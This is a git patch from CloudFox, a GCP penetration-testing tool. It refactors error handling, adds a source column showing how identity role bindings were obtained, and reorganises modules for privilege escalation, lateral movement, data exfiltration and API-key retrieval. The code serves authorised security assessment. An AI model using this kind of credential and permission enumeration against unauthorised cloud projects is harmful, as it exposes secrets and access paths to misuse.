"group" { + groupCount++ + } else { + directCount++ } } - logger.InfoM(fmt.Sprintf("Found %d role binding(s) for current identity", len(m.RoleBindings)), globals.GCP_WHOAMI_MODULE_NAME) + if groupCount > 0 { + logger.InfoM(fmt.Sprintf("Found %d role binding(s) (%d direct, %d via groups)", len(m.RoleBindings), directCount, groupCount), globals.GCP_WHOAMI_MODULE_NAME) + } else { + logger.InfoM(fmt.Sprintf("Found %d role binding(s) for current identity", len(m.RoleBindings)), globals.GCP_WHOAMI_MODULE_NAME) + } } // findImpersonationTargets identifies service accounts that can be impersonated @@ -736,15 +883,27 @@ func (m *WhoAmIModule) writeOutput(ctx context.Context, logger internal.Logger) if len(m.Identity.Groups) > 1 { label = fmt.Sprintf("Group %d", i+1) } + + // Build display value with source indicator + var displayValue string if group.DisplayName != "" && group.Email != "" { - identityBody = append(identityBody, []string{label, fmt.Sprintf("%s (%s)", group.DisplayName, group.Email)}) + displayValue = fmt.Sprintf("%s (%s)", group.DisplayName, group.Email) } else if group.Email != "" { - identityBody = append(identityBody, []string{label, group.Email}) + displayValue = group.Email } else if group.DisplayName != "" { - identityBody = append(identityBody, []string{label, group.DisplayName}) + displayValue = group.DisplayName } else { - identityBody = append(identityBody, []string{label, group.GroupID}) + displayValue = group.GroupID + } + + // Add source indicator + if group.Source == "provided" { + displayValue += " (provided)" + } else if group.Source == "enumerated" && m.Identity.GroupsMismatch { + displayValue += " (enumerated)" } + + identityBody = append(identityBody, []string{label, displayValue}) } if len(m.Identity.Groups) == 0 { if m.Identity.GroupsEnumerated { @@ -765,11 +924,22 @@ func (m *WhoAmIModule) writeOutput(ctx context.Context, logger internal.Logger) if rb.ScopeName != "" { scopeDisplay = fmt.Sprintf("%s (%s)", rb.ScopeName, rb.ScopeID) } - inheritedStr := "" - if rb.Inherited { - inheritedStr = " [inherited]" + + // Build source/inheritance info + sourceStr := "" + if rb.InheritedFrom != "" && rb.InheritedFrom != "direct" { + if strings.HasPrefix(rb.InheritedFrom, "group:") { + // Group-based binding + sourceStr = fmt.Sprintf(" [via %s]", rb.InheritedFrom) + } else { + // Inherited from parent resource (folder/org) + sourceStr = fmt.Sprintf(" [inherited from %s]", rb.InheritedFrom) + } + } else if rb.InheritedFrom == "direct" { + sourceStr = " [direct]" } - identityBody = append(identityBody, []string{label, fmt.Sprintf("%s on %s/%s%s", rb.Role, rb.Scope, scopeDisplay, inheritedStr)}) + + identityBody = append(identityBody, []string{label, fmt.Sprintf("%s on %s/%s%s", rb.Role, rb.Scope, scopeDisplay, sourceStr)}) } if len(m.RoleBindings) == 0 { identityBody = append(identityBody, []string{"Role Bindings", "0"}) @@ -786,14 +956,20 @@ func (m *WhoAmIModule) writeOutput(ctx context.Context, logger internal.Logger) "Role", "Scope", "Scope ID", + "Source", } var rolesBody [][]string for _, rb := range m.RoleBindings { + source := rb.InheritedFrom + if source == "" { + source = "direct" + } rolesBody = append(rolesBody, []string{ rb.Role, rb.Scope, rb.ScopeID, + source, }) } diff --git a/gcp/services/apikeysService/apikeysService.go b/gcp/services/apikeysService/apikeysService.go index 044417c3..bd1c4550 100644 --- a/gcp/services/apikeysService/apikeysService.go +++ b/gcp/services/apikeysService/apikeysService.go @@ -312,7 +312,9 @@ func (s *APIKeysService) ListAPIKeysWithKeyStrings(projectID string) ([]APIKeyIn keyString, err := s.GetKeyString(keys[i].Name) if err != nil { // Log but don't fail - we might not have permission - logger.InfoM(fmt.Sprintf("Could not get key string for %s: %v", keys[i].Name, err), globals.GCP_APIKEYS_MODULE_NAME) + parsedErr := gcpinternal.ParseGCPError(err, "apikeys.googleapis.com") + gcpinternal.HandleGCPError(parsedErr, logger, globals.GCP_APIKEYS_MODULE_NAME, + fmt.Sprintf("Could not get key string for %s", keys[i].Name)) } else { keys[i].KeyString = keyString } diff --git a/gcp/services/artifactRegistryService/artifactRegistryService.go b/gcp/services/artifactRegistryService/artifactRegistryService.go index 9ecf193a..cd8a7abc 100644 --- a/gcp/services/artifactRegistryService/artifactRegistryService.go +++ b/gcp/services/artifactRegistryService/artifactRegistryService.go @@ -105,7 +105,9 @@ func (ars *ArtifactRegistryService) RepositoriesAndArtifacts(projectID string) ( // Fetch artifacts for the current repository. artifacts, err := ars.Artifacts(projectID, location, repositoryName) if err != nil { - logger.InfoM(fmt.Sprintf("Failed to retrieve artifacts for repository %s: %v", repositoryName, err), globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME) + parsedErr := gcpinternal.ParseGCPError(err, "artifactregistry.googleapis.com") + gcpinternal.HandleGCPError(parsedErr, logger, globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME, + fmt.Sprintf("Failed to retrieve artifacts for repository %s", repositoryName)) continue // Optionally continue to the next repository or handle error differently. } combinedInfo.Artifacts = append(combinedInfo.Artifacts, artifacts...) diff --git a/gcp/services/filestoreService/filestoreService.go b/gcp/services/filestoreService/filestoreService.go index c6af8cc9..837d259f 100644 --- a/gcp/services/filestoreService/filestoreService.go +++ b/gcp/services/filestoreService/filestoreService.go @@ -72,7 +72,7 @@ func (s *FilestoreService) ListInstances(projectID string) ([]FilestoreInstanceI return nil }) if err != nil { - return nil, err + return nil, gcpinternal.ParseGCPError(err, "file.googleapis.com") } return instances, nil } diff --git a/gcp/services/iamService/iamService.go b/gcp/services/iamService/iamService.go index f268dfa5..4b12f910 100644 --- a/gcp/services/iamService/iamService.go +++ b/gcp/services/iamService/iamService.go @@ -419,7 +419,9 @@ func (s *IAMService) ServiceAccounts(projectID string) ([]ServiceAccountInfo, er keys, err := s.getServiceAccountKeys(ctx, iamService, sa.Name) if err != nil { // Log but don't fail - we might not have permission - logger.InfoM(fmt.Sprintf("Could not list keys for %s: %v", sa.Email, err), globals.GCP_IAM_MODULE_NAME) + parsedErr := gcpinternal.ParseGCPError(err, "iam.googleapis.com") + gcpinternal.HandleGCPError(parsedErr, logger, globals.GCP_IAM_MODULE_NAME, + fmt.Sprintf("Could not list keys for %s", sa.Email)) } else { saInfo.Keys = keys // Count user-managed keys only @@ -520,7 +522,9 @@ func (s *IAMService) CustomRoles(projectID string) ([]CustomRole, error) { }) if err != nil { // Don't fail completely - we might just not have access to list roles - logger.InfoM(fmt.Sprintf("Could not list custom roles for project %s: %v", projectID, err), globals.GCP_IAM_MODULE_NAME) + parsedErr := gcpinternal.ParseGCPError(err, "iam.googleapis.com") + gcpinternal.HandleGCPError(parsedErr, logger, globals.GCP_IAM_MODULE_NAME, + fmt.Sprintf("Could not list custom roles for project %s", projectID)) } return customRoles, nil @@ -534,7 +538,8 @@ func (s *IAMService) PoliciesWithInheritance(projectID string) ([]PolicyBinding, ancestry, err := s.projectAncestry(projectID) if err != nil { // If we can't get ancestry, just return project-level policies - logger.InfoM(fmt.Sprintf("Could not get ancestry for project %s, returning project-level policies only: %v", projectID, err), globals.GCP_IAM_MODULE_NAME) + gcpinternal.HandleGCPError(err, logger, globals.GCP_IAM_MODULE_NAME, + fmt.Sprintf("Could not get ancestry for project %s, returning project-level policies only", projectID)) return s.Policies(projectID, "project") } @@ -544,7 +549,8 @@ func (s *IAMService) PoliciesWithInheritance(projectID string) ([]PolicyBinding, for _, resource := range ancestry { bindings, err := s.getPoliciesForResource(ctx, resource.Id, resource.Type) if err != nil { - logger.InfoM(fmt.Sprintf("Could not get policies for %s/%s: %v", resource.Type, resource.Id, err), globals.GCP_IAM_MODULE_NAME) + gcpinternal.HandleGCPError(err, logger, globals.GCP_IAM_MODULE_NAME, + fmt.Sprintf("Could not get policies for %s/%s", resource.Type, resource.Id)) continue } @@ -576,14 +582,14 @@ func (s *IAMService) getPoliciesForResource(ctx context.Context, resourceID stri client, err = resourcemanager.NewProjectsClient(ctx) } if err != nil { - return nil, err + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") } defer client.Close() resourceName = "projects/" + resourceID policy, err := client.GetIamPolicy(ctx, &iampb.GetIamPolicyRequest{Resource: resourceName}) if err != nil { - return nil, err + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") } return convertPolicyToBindings(policy, resourceID, resourceType, resourceName), nil @@ -596,14 +602,14 @@ func (s *IAMService) getPoliciesForResource(ctx context.Context, resourceID stri client, err = resourcemanager.NewFoldersClient(ctx) } if err != nil { - return nil, err + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") } defer client.Close() resourceName = "folders/" + resourceID policy, err := client.GetIamPolicy(ctx, &iampb.GetIamPolicyRequest{Resource: resourceName}) if err != nil { - return nil, err + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") } return convertPolicyToBindings(policy, resourceID, resourceType, resourceName), nil @@ -616,14 +622,14 @@ func (s *IAMService) getPoliciesForResource(ctx context.Context, resourceID stri client, err = resourcemanager.NewOrganizationsClient(ctx) } if err != nil { - return nil, err + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") } defer client.Close() resourceName = "organizations/" + resourceID policy, err := client.GetIamPolicy(ctx, &iampb.GetIamPolicyRequest{Resource: resourceName}) if err != nil { - return nil, err + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") } return convertPolicyToBindings(policy, resourceID, resourceType, resourceName), nil @@ -675,7 +681,8 @@ func (s *IAMService) CombinedIAM(projectID string) (CombinedIAMData, error) { serviceAccounts, err := s.ServiceAccounts(projectID) if err != nil { // Don't fail completely - logger.InfoM(fmt.Sprintf("Could not get service accounts: %v", err), globals.GCP_IAM_MODULE_NAME) + gcpinternal.HandleGCPError(err, logger, globals.GCP_IAM_MODULE_NAME, + "Could not get service accounts") } else { data.ServiceAccounts = serviceAccounts } @@ -683,7 +690,8 @@ func (s *IAMService) CombinedIAM(projectID string) (CombinedIAMData, error) { // Get custom roles customRoles, err := s.CustomRoles(projectID) if err != nil { - logger.InfoM(fmt.Sprintf("Could not get custom roles: %v", err), globals.GCP_IAM_MODULE_NAME) + gcpinternal.HandleGCPError(err, logger, globals.GCP_IAM_MODULE_NAME, + "Could not get custom roles") } else { data.CustomRoles = customRoles } @@ -910,7 +918,8 @@ func (s *IAMService) GetEntityPermissions(ctx context.Context, projectID string, // Get permissions for this role permissions, err := s.GetRolePermissions(ctx, binding.Role) if err != nil { - logger.InfoM(fmt.Sprintf("Could not get permissions for role %s: %v", binding.Role, err), globals.GCP_IAM_MODULE_NAME) + gcpinternal.HandleGCPError(err, logger, globals.GCP_IAM_MODULE_NAME, + fmt.Sprintf("Could not get permissions for role %s", binding.Role)) continue } @@ -959,7 +968,8 @@ func (s *IAMService) GetAllEntityPermissions(projectID string) ([]EntityPermissi for _, principal := range principals { entityPerms, err := s.GetEntityPermissions(ctx, projectID, principal.Name) if err != nil { - logger.InfoM(fmt.Sprintf("Could not get permissions for %s: %v", principal.Name, err), globals.GCP_IAM_MODULE_NAME) + gcpinternal.HandleGCPError(err, logger, globals.GCP_IAM_MODULE_NAME, + fmt.Sprintf("Could not get permissions for %s", principal.Name)) continue } allPerms = append(allPerms, *entityPerms) @@ -1054,7 +1064,8 @@ func (s *IAMService) GetGroupMemberships(ctx context.Context, groups []GroupInfo enrichedGroup, err := s.GetGroupMembership(ctx, group.Email) if err != nil { // Log but don't fail - Cloud Identity API access is often restricted - logger.InfoM(fmt.Sprintf("Could not enumerate membership for group %s: %v", group.Email, err), globals.GCP_IAM_MODULE_NAME) + gcpinternal.HandleGCPError(err, logger, globals.GCP_IAM_MODULE_NAME, + fmt.Sprintf("Could not enumerate membership for group %s", group.Email)) // Keep the original group info without membership group.MembershipEnumerated = false enrichedGroups = append(enrichedGroups, group) @@ -1208,7 +1219,8 @@ func (s *IAMService) GetAllEntityPermissionsWithGroupExpansion(projectID string) // Expand permissions based on group membership expandedPerms, err := s.ExpandGroupPermissions(ctx, projectID, entityPerms) if err != nil { - logger.InfoM(fmt.Sprintf("Could not expand group permissions: %v", err), globals.GCP_IAM_MODULE_NAME) + gcpinternal.HandleGCPError(err, logger, globals.GCP_IAM_MODULE_NAME, + "Could not expand group permissions") return entityPerms, enrichedGroups, nil } @@ -1302,7 +1314,8 @@ func (s *IAMService) GetAllServiceAccountImpersonation(projectID string) ([]SAIm info, err := s.GetServiceAccountIAMPolicy(ctx, sa.Email, projectID) if err != nil { // Log but don't fail - we might not have permission - logger.InfoM(fmt.Sprintf("Could not get IAM policy for SA %s: %v", sa.Email, err), globals.GCP_IAM_MODULE_NAME) + gcpinternal.HandleGCPError(err, logger, globals.GCP_IAM_MODULE_NAME, + fmt.Sprintf("Could not get IAM policy for SA %s", sa.Email)) continue } results = append(results, *info) diff --git a/gcp/services/organizationsService/organizationsService.go b/gcp/services/organizationsService/organizationsService.go index 226f6dc3..ae4c2654 100644 --- a/gcp/services/organizationsService/organizationsService.go +++ b/gcp/services/organizationsService/organizationsService.go @@ -368,6 +368,23 @@ func (s *OrganizationsService) GetProjectAncestry(projectID string) ([]Hierarchy return ancestry, nil } +// GetOrganizationIDFromProject returns the organization ID for a given project +// by walking up the resource hierarchy until it finds an organization +func (s *OrganizationsService) GetOrganizationIDFromProject(projectID string) (string, error) { + ancestry, err := s.GetProjectAncestry(projectID) + if err != nil { + return "", err + } + + for _, node := range ancestry { + if node.Type == "organization" { + return node.ID, nil + } + } + + return "", fmt.Errorf("no organization found in ancestry for project %s", projectID) +} + // BuildHierarchy builds a complete hierarchy tree func (s *OrganizationsService) BuildHierarchy() ([]HierarchyNode, error) { // Get organizations diff --git a/go.mod b/go.mod index e3398fdf..6289fc6f 100644 --- a/go.mod +++ b/go.mod @@ -215,5 +215,5 @@ require ( golang.org/x/xerrors v0.0.0-20240903120638-7835f813f4da // indirect google.golang.org/genproto/googleapis/api v0.0.0-20251202230838-ff82c1b0f217 // indirect google.golang.org/genproto/googleapis/rpc v0.0.0-20251202230838-ff82c1b0f217 // indirect - google.golang.org/grpc v1.77.0 // indirect + google.golang.org/grpc v1.77.0 ) diff --git a/internal/gcp/base.go b/internal/gcp/base.go index d3a055a6..2b93b5f6 100644 --- a/internal/gcp/base.go +++ b/internal/gcp/base.go @@ -11,6 +11,8 @@ import ( "github.com/BishopFox/cloudfox/internal" "github.com/spf13/cobra" "google.golang.org/api/googleapi" + "google.golang.org/grpc/codes" + "google.golang.org/grpc/status" ) // ------------------------------ @@ -24,11 +26,45 @@ var ( // ParseGCPError converts GCP API errors into cleaner, standardized error types // This should be used by all GCP service modules for consistent error handling +// Handles both REST API errors (googleapi.Error) and gRPC errors (status.Error) func ParseGCPError(err error, apiName string) error { if err == nil { return nil } + // Check for gRPC status errors (used by Cloud Asset, Spanner, and other gRPC-based APIs) + if grpcStatus, ok := status.FromError(err); ok { + errStr := err.Error() + + switch grpcStatus.Code() { + case codes.PermissionDenied: + // Check for SERVICE_DISABLED in error details or message + if strings.Contains(errStr, "SERVICE_DISABLED") { + return fmt.Errorf("%w: %s", ErrAPINotEnabled, apiName) + } + return ErrPermissionDenied + + case codes.NotFound: + return ErrNotFound + + case codes.Unauthenticated: + return fmt.Errorf("authentication failed - check credentials") + + case codes.ResourceExhausted: + return fmt.Errorf("rate limited - too many requests") + + case codes.Unavailable, codes.Internal: + return fmt.Errorf("GCP service error: %s", grpcStatus.Message()) + + case codes.InvalidArgument: + return fmt.Errorf("bad request: %s", grpcStatus.Message()) + } + + // Default: return cleaner error message + return fmt.Errorf("gRPC error (%s): %s", grpcStatus.Code().String(), grpcStatus.Message()) + } + + // Check for REST API errors (googleapi.Error) var googleErr *googleapi.Error if errors.As(err, &googleErr) { errStr := googleErr.Error() @@ -65,6 +101,15 @@ func ParseGCPError(err error, apiName string) error { return fmt.Errorf("API error (code %d): %s", googleErr.Code, googleErr.Message) } + // Fallback: check error string for common patterns + errStr := err.Error() + if strings.Contains(errStr, "SERVICE_DISABLED") { + return fmt.Errorf("%w: %s", ErrAPINotEnabled, apiName) + } + if strings.Contains(errStr, "PERMISSION_DENIED") || strings.Contains(errStr, "PermissionDenied") { + return ErrPermissionDenied + } + return err } From 36b45a64c5d682ce15f9e482c5e712e49aa4bcea Mon Sep 17 00:00:00 2001 From: jbarciabf Date: Mon, 12 Jan 2026 21:08:19 -0500 Subject: [PATCH 08/48] rework --- cli/gcp.go | 23 +- gcp/commands/accesslevels.go | 52 +- gcp/commands/apikeys.go | 532 -------- gcp/commands/appengine.go | 558 +++------ gcp/commands/artifact-registry.go | 413 ++----- gcp/commands/assetinventory.go | 521 ++++++-- gcp/commands/backupinventory.go | 823 +++++-------- gcp/commands/beyondcorp.go | 138 ++- gcp/commands/bigquery.go | 384 ++---- gcp/commands/bigtable.go | 210 +++- gcp/commands/bucketenum.go | 206 +--- gcp/commands/buckets.go | 457 +------ gcp/commands/certmanager.go | 231 ++-- gcp/commands/cloudarmor.go | 174 +-- gcp/commands/cloudbuild.go | 231 ++-- gcp/commands/cloudrun.go | 392 +++--- gcp/commands/cloudsql.go | 597 ++------- gcp/commands/compliancedashboard.go | 7 +- gcp/commands/composer.go | 117 +- gcp/commands/containersecurity.go | 827 ------------- gcp/commands/costsecurity.go | 192 ++- gcp/commands/crossproject.go | 272 ++--- gcp/commands/customroles.go | 402 ------ gcp/commands/dataexfiltration.go | 193 ++- gcp/commands/dataflow.go | 91 +- gcp/commands/dataproc.go | 155 +-- gcp/commands/dns.go | 149 +-- gcp/commands/domainwidedelegation.go | 148 +-- gcp/commands/endpoints.go | 1080 ++++++++++------ gcp/commands/filestore.go | 76 +- gcp/commands/firewall.go | 381 +----- gcp/commands/functions.go | 564 ++------- gcp/commands/gke.go | 595 +-------- gcp/commands/hmackeys.go | 282 ----- gcp/commands/iam.go | 910 +++++++------- gcp/commands/iap.go | 109 +- gcp/commands/identityprotection.go | 936 -------------- gcp/commands/instances.go | 812 +++--------- gcp/commands/keys.go | 415 +++++++ gcp/commands/kms.go | 148 +-- gcp/commands/lateralmovement.go | 643 ++++++---- gcp/commands/loadbalancers.go | 140 +-- gcp/commands/logging.go | 353 ++---- gcp/commands/logginggaps.go | 153 +-- gcp/commands/memorystore.go | 233 +--- gcp/commands/monitoringalerts.go | 591 ++++----- gcp/commands/networkendpoints.go | 417 ------- gcp/commands/networkexposure.go | 771 ------------ gcp/commands/networktopology.go | 418 +++---- gcp/commands/notebooks.go | 151 ++- gcp/commands/organizations.go | 86 +- gcp/commands/orgpolicies.go | 226 +--- gcp/commands/permissions.go | 1084 +++++------------ gcp/commands/privateserviceconnect.go | 482 ++++++++ gcp/commands/privesc.go | 207 +--- gcp/commands/publicresources.go | 352 ------ gcp/commands/pubsub.go | 576 +++------ gcp/commands/resourcegraph.go | 741 ----------- gcp/commands/resourceiam.go | 343 ++++++ gcp/commands/scheduler.go | 136 +-- gcp/commands/secrets.go | 435 ++----- gcp/commands/securitycenter.go | 375 ++---- gcp/commands/serviceaccounts.go | 676 ++++------ gcp/commands/serviceagents.go | 180 +-- gcp/commands/sourcerepos.go | 111 +- gcp/commands/spanner.go | 254 +++- gcp/commands/sshoslogin.go | 389 ------ gcp/commands/vpcnetworks.go | 164 ++- gcp/commands/vpcsc.go | 201 +-- gcp/commands/whoami.go | 2 +- gcp/commands/workloadidentity.go | 340 ++---- .../artifactRegistryService.go | 9 +- gcp/services/assetService/assetService.go | 89 +- .../beyondcorpService/beyondcorpService.go | 139 +-- .../bigqueryService/bigqueryService.go | 83 +- .../bigtableService/bigtableService.go | 95 +- .../bucketEnumService/bucketEnumService.go | 21 + .../certManagerService/certManagerService.go | 166 +-- .../cloudArmorService/cloudArmorService.go | 89 +- .../cloudbuildService/cloudbuildService.go | 57 +- .../cloudrunService/cloudrunService.go | 197 ++- .../composerService/composerService.go | 73 +- .../computeEngineService.go | 37 + .../customRolesService/customRolesService.go | 285 ----- .../dataprocService/dataprocService.go | 81 +- gcp/services/dnsService/dnsService.go | 34 + .../domainWideDelegationService.go | 80 +- .../functionsService/functionsService.go | 197 +-- gcp/services/gkeService/gkeService.go | 122 -- gcp/services/iamService/iamService.go | 430 ++++++- gcp/services/iapService/iapService.go | 196 +-- gcp/services/kmsService/kmsService.go | 49 +- .../loadbalancerService.go | 125 +- .../memorystoreService/memorystoreService.go | 70 +- .../networkEndpointsService.go | 208 +--- gcp/services/networkService/networkService.go | 93 +- .../notebooksService/notebooksService.go | 148 +-- .../orgpolicyService/orgpolicyService.go | 91 +- .../publicResourcesService.go | 538 -------- gcp/services/pubsubService/pubsubService.go | 111 +- .../resourceIAMService/resourceIAMService.go | 649 ++++++++++ .../serviceAgentsService.go | 75 +- .../sourceReposService/sourceReposService.go | 117 +- gcp/services/spannerService/spannerService.go | 139 ++- .../sshOsLoginService/sshOsLoginService.go | 378 ------ gcp/services/vpcService/vpcService.go | 185 +-- gcp/services/vpcscService/vpcscService.go | 109 +- .../workloadIdentityService.go | 195 +-- globals/gcp.go | 11 +- go.mod | 4 + go.sum | 85 ++ internal/gcp/base.go | 9 + internal/output2.go | 17 +- 113 files changed, 11029 insertions(+), 20890 deletions(-) delete mode 100644 gcp/commands/apikeys.go delete mode 100644 gcp/commands/containersecurity.go delete mode 100644 gcp/commands/customroles.go delete mode 100644 gcp/commands/hmackeys.go delete mode 100644 gcp/commands/identityprotection.go create mode 100644 gcp/commands/keys.go delete mode 100644 gcp/commands/networkendpoints.go delete mode 100644 gcp/commands/networkexposure.go create mode 100644 gcp/commands/privateserviceconnect.go delete mode 100644 gcp/commands/publicresources.go delete mode 100644 gcp/commands/resourcegraph.go create mode 100644 gcp/commands/resourceiam.go delete mode 100644 gcp/commands/sshoslogin.go delete mode 100644 gcp/services/customRolesService/customRolesService.go delete mode 100644 gcp/services/publicResourcesService/publicResourcesService.go create mode 100644 gcp/services/resourceIAMService/resourceIAMService.go delete mode 100644 gcp/services/sshOsLoginService/sshOsLoginService.go diff --git a/cli/gcp.go b/cli/gcp.go index 184fe8e4..ede190ea 100644 --- a/cli/gcp.go +++ b/cli/gcp.go @@ -135,6 +135,9 @@ var GCPAllChecksCommand = &cobra.Command{ if childCmd == cmd { // Skip the run-all command itself to avoid infinite recursion continue } + if childCmd.Hidden { // Skip hidden commands + continue + } GCPLogger.InfoM(fmt.Sprintf("Running command: %s", childCmd.Use), "all-checks") childCmd.Run(cmd, args) @@ -170,12 +173,14 @@ func init() { commands.GCPSecretsCommand, commands.GCPIAMCommand, commands.GCPPermissionsCommand, + commands.GCPResourceIAMCommand, commands.GCPInstancesCommand, commands.GCPWhoAmICommand, - // New compute/serverless commands + // Compute/serverless commands commands.GCPFunctionsCommand, commands.GCPCloudRunCommand, + commands.GCPAppEngineCommand, commands.GCPGKECommand, commands.GCPCloudSQLCommand, @@ -187,7 +192,7 @@ func init() { commands.GCPDNSCommand, commands.GCPFirewallCommand, commands.GCPServiceAccountsCommand, - commands.GCPAPIKeysCommand, + commands.GCPKeysCommand, commands.GCPEndpointsCommand, commands.GCPWorkloadIdentityCommand, commands.GCPOrganizationsCommand, @@ -204,10 +209,16 @@ func init() { // Security/Compliance commands commands.GCPVPCSCCommand, commands.GCPAssetInventoryCommand, + commands.GCPSecurityCenterCommand, + commands.GCPComplianceDashboardCommand, + commands.GCPBackupInventoryCommand, + commands.GCPCostSecurityCommand, + commands.GCPMonitoringAlertsCommand, // Network/Infrastructure commands commands.GCPLoadBalancersCommand, commands.GCPVPCNetworksCommand, + commands.GCPNetworkTopologyCommand, // ML/Data Science commands commands.GCPNotebooksCommand, @@ -219,21 +230,19 @@ func init() { commands.GCPAccessLevelsCommand, // Pentest/Exploitation commands - commands.GCPHMACKeysCommand, commands.GCPPrivescCommand, commands.GCPOrgPoliciesCommand, commands.GCPBucketEnumCommand, commands.GCPCrossProjectCommand, - commands.GCPCustomRolesCommand, - commands.GCPPublicResourcesCommand, commands.GCPLoggingGapsCommand, commands.GCPSourceReposCommand, - commands.GCPSSHOsLoginCommand, commands.GCPServiceAgentsCommand, commands.GCPDomainWideDelegationCommand, - commands.GCPNetworkEndpointsCommand, + commands.GCPPrivateServiceConnectCommand, commands.GCPCloudArmorCommand, commands.GCPCertManagerCommand, + commands.GCPLateralMovementCommand, + commands.GCPDataExfiltrationCommand, // All checks (last) GCPAllChecksCommand, diff --git a/gcp/commands/accesslevels.go b/gcp/commands/accesslevels.go index 4f6c215f..01e1bd91 100644 --- a/gcp/commands/accesslevels.go +++ b/gcp/commands/accesslevels.go @@ -138,37 +138,29 @@ func (m *AccessLevelsModule) Execute(ctx context.Context, logger internal.Logger m.addToLoot(level) } - permissiveCount := 0 - for _, level := range m.AccessLevels { - if level.RiskLevel == "HIGH" || level.RiskLevel == "MEDIUM" { - permissiveCount++ - } - } - - logger.SuccessM(fmt.Sprintf("Found %d access level(s) (%d potentially permissive)", - len(m.AccessLevels), permissiveCount), globals.GCP_ACCESSLEVELS_MODULE_NAME) + logger.SuccessM(fmt.Sprintf("Found %d access level(s)", len(m.AccessLevels)), globals.GCP_ACCESSLEVELS_MODULE_NAME) m.writeOutput(ctx, logger) } func (m *AccessLevelsModule) initializeLootFiles() { - m.LootMap["access-levels"] = &internal.LootFile{ - Name: "access-levels", + m.LootMap["access-levels-details"] = &internal.LootFile{ + Name: "access-levels-details", Contents: "# Access Levels (Conditional Access Policies)\n# Generated by CloudFox\n\n", } - m.LootMap["allowed-ips"] = &internal.LootFile{ - Name: "access-level-allowed-ips", + m.LootMap["access-levels-allowed-ips"] = &internal.LootFile{ + Name: "access-levels-allowed-ips", Contents: "", } } func (m *AccessLevelsModule) addToLoot(level accesspolicyservice.AccessLevelInfo) { - m.LootMap["access-levels"].Contents += fmt.Sprintf( + m.LootMap["access-levels-details"].Contents += fmt.Sprintf( "# Level: %s\n# Title: %s\n# Policy: %s\n# Combining: %s\n# Conditions: %d\n\n", level.Name, level.Title, level.PolicyName, level.CombiningFunction, len(level.Conditions)) for _, condition := range level.Conditions { for _, ip := range condition.IPSubnetworks { - m.LootMap["allowed-ips"].Contents += fmt.Sprintf("%s # %s\n", ip, level.Name) + m.LootMap["access-levels-allowed-ips"].Contents += fmt.Sprintf("%s # %s\n", ip, level.Name) } } } @@ -177,7 +169,7 @@ func (m *AccessLevelsModule) writeOutput(ctx context.Context, logger internal.Lo var tables []internal.TableFile // Access Levels table - header := []string{"Name", "Title", "Policy", "Combining", "Conditions", "Device Policy", "Risk"} + header := []string{"Name", "Title", "Policy", "Combining", "Conditions", "Device Policy"} var body [][]string for _, level := range m.AccessLevels { hasDevicePolicy := "No" @@ -200,7 +192,6 @@ func (m *AccessLevelsModule) writeOutput(ctx context.Context, logger internal.Lo combiningFunc, fmt.Sprintf("%d", len(level.Conditions)), hasDevicePolicy, - level.RiskLevel, }) } tables = append(tables, internal.TableFile{ @@ -214,17 +205,11 @@ func (m *AccessLevelsModule) writeOutput(ctx context.Context, logger internal.Lo for _, level := range m.AccessLevels { for i, cond := range level.Conditions { ipRanges := strings.Join(cond.IPSubnetworks, ", ") - if len(ipRanges) > 40 { - ipRanges = ipRanges[:37] + "..." - } if ipRanges == "" { ipRanges = "(any)" } members := strings.Join(cond.Members, ", ") - if len(members) > 40 { - members = members[:37] + "..." - } if members == "" { members = "(any)" } @@ -270,27 +255,6 @@ func (m *AccessLevelsModule) writeOutput(ctx context.Context, logger internal.Lo }) } - // High-risk findings - var highRiskBody [][]string - for _, level := range m.AccessLevels { - if level.RiskLevel == "HIGH" || level.RiskLevel == "MEDIUM" { - highRiskBody = append(highRiskBody, []string{ - level.Name, - level.Title, - level.RiskLevel, - strings.Join(level.RiskReasons, "; "), - }) - } - } - - if len(highRiskBody) > 0 { - tables = append(tables, internal.TableFile{ - Name: "access-level-risks", - Header: []string{"Name", "Title", "Risk Level", "Reasons"}, - Body: highRiskBody, - }) - } - var lootFiles []internal.LootFile for _, loot := range m.LootMap { if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { diff --git a/gcp/commands/apikeys.go b/gcp/commands/apikeys.go deleted file mode 100644 index e21c16f7..00000000 --- a/gcp/commands/apikeys.go +++ /dev/null @@ -1,532 +0,0 @@ -package commands - -import ( - "context" - "fmt" - "strings" - "sync" - "time" - - apikeysservice "github.com/BishopFox/cloudfox/gcp/services/apikeysService" - "github.com/BishopFox/cloudfox/globals" - "github.com/BishopFox/cloudfox/internal" - gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" - "github.com/spf13/cobra" -) - -var GCPAPIKeysCommand = &cobra.Command{ - Use: globals.GCP_APIKEYS_MODULE_NAME, - Aliases: []string{"api-keys", "keys"}, - Short: "Enumerate GCP API keys with security analysis", - Long: `Enumerate GCP API keys with detailed security analysis. - -Features: -- Lists all API keys in the project -- Analyzes key restrictions (API, IP, referer, app) -- Retrieves key strings (if permissions allow) -- Identifies unrestricted or weakly restricted keys -- Flags old keys without rotation -- Shows API targets and access patterns -- Generates commands for testing key access`, - Run: runGCPAPIKeysCommand, -} - -// ------------------------------ -// Module Struct with embedded BaseGCPModule -// ------------------------------ -type APIKeysModule struct { - gcpinternal.BaseGCPModule - - // Module-specific fields - APIKeys []apikeysservice.APIKeyInfo - LootMap map[string]*internal.LootFile - mu sync.Mutex -} - -// ------------------------------ -// Output Struct implementing CloudfoxOutput interface -// ------------------------------ -type APIKeysOutput struct { - Table []internal.TableFile - Loot []internal.LootFile -} - -func (o APIKeysOutput) TableFiles() []internal.TableFile { return o.Table } -func (o APIKeysOutput) LootFiles() []internal.LootFile { return o.Loot } - -// ------------------------------ -// Command Entry Point -// ------------------------------ -func runGCPAPIKeysCommand(cmd *cobra.Command, args []string) { - // Initialize command context - cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_APIKEYS_MODULE_NAME) - if err != nil { - return // Error already logged - } - - // Create module instance - module := &APIKeysModule{ - BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), - APIKeys: 